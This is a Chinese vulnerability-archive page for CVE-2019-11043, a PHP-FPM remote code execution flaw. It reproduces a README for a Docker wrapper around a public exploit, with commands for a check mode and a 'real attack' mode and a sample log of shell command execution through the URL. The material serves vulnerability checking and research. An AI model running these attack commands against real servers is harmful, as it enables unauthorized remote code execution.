关联漏洞
标题:
PHP 缓冲区错误漏洞
(CVE-2019-11043)
描述:PHP(PHP:Hypertext Preprocessor,PHP:超文本预处理器)是PHPGroup和开放源代码社区的共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发,支持多种数据库及操作系统。 PHP中存在缓冲区错误漏洞。该漏洞源于网络系统或产品在内存上执行操作时,未正确验证数据边界,导致向关联的其他内存位置上执行了错误的读写操作。攻击者可利用该漏洞导致缓冲区溢出或堆溢出等。以下产品及版本受到影响:PHP 7.1.33之前版本的7.1.x版本,7.2.24之前版本的7.2.x版本,7
描述
Docker image and commands to check CVE-2019-11043 vulnerability on nginx/php-fpm applications.
介绍
# Docker image and commands to check CVE-2019-11043
[](https://travis-ci.org/ypereirareis/docker-CVE-2019-11043)
* **CVE:** CVE-2019-11043
* **Description:** In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.
* **Details :** https://nvd.nist.gov/vuln/detail/CVE-2019-11043
* **Github exploit:** https://github.com/neex/phuip-fpizdam
## Help
```bash
docker run --rm ypereirareis/cve-2019-11043
docker run --rm ypereirareis/cve-2019-11043 -h
```
## Check a website or URL
```bash
docker run --rm ypereirareis/cve-2019-11043 --only-qsl https://domain.tld/index.php
```
### Vulnerability result example:
https://github.com/neex/phuip-fpizdam#playground-environment
**Check mode only**
```bash
$ docker run --rm --net=host ypereirareis/cve-2019-11043 --only-qsl http://127.0.0.1:8080/script.php
2019/10/30 10:55:35 Base status code is 200
2019/10/30 10:55:35 Status code 502 for qsl=1765, adding as a candidate
2019/10/30 10:55:35 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2019/10/30 10:55:35 Detect() found QSLs and that's it
```
**Real attack mod**
```bash
$ docker run --rm --net=host ypereirareis/cve-2019-11043 http://127.0.0.1:8080/script.php
2019/10/30 11:03:33 Base status code is 200
2019/10/30 11:03:33 Status code 502 for qsl=1765, adding as a candidate
2019/10/30 11:03:33 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2019/10/30 11:03:33 Attack params found: --qsl 1760 --pisos 55 --skip-detect
2019/10/30 11:03:33 Trying to set "session.auto_start=0"...
2019/10/30 11:03:33 Detect() returned attack params: --qsl 1760 --pisos 55 --skip-detect <-- REMEMBER THIS
2019/10/30 11:03:33 Performing attack using php.ini settings...
2019/10/30 11:03:33 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2019/10/30 11:03:33 Trying to cleanup /tmp/a...
2019/10/30 11:03:33 Done!
```
### No Vulnerability result example:
```bash
$ docker run --rm ypereirareis/cve-2019-11043 --only-qsl https://domain.tld/wp_admin.php
2019/10/28 09:41:30 Base status code is 200
2019/10/28 09:41:32 Detect() returned error: no qsl candidates found, invulnerable or something wrong
```
## Build the docker image
```bash
docker build -t ypereirareis/cve-2019-11043 .
```
文件快照
[4.0K] /data/pocs/3955607f4bce4cd9ac17edaa81ddb7f66e3c7875
├── [ 285] Dockerfile
├── [4.0K] img
│ └── [ 74K] exploit.jpg
├── [1.1K] LICENSE
├── [2.6K] README.md
└── [ 150] tests.sh
1 directory, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。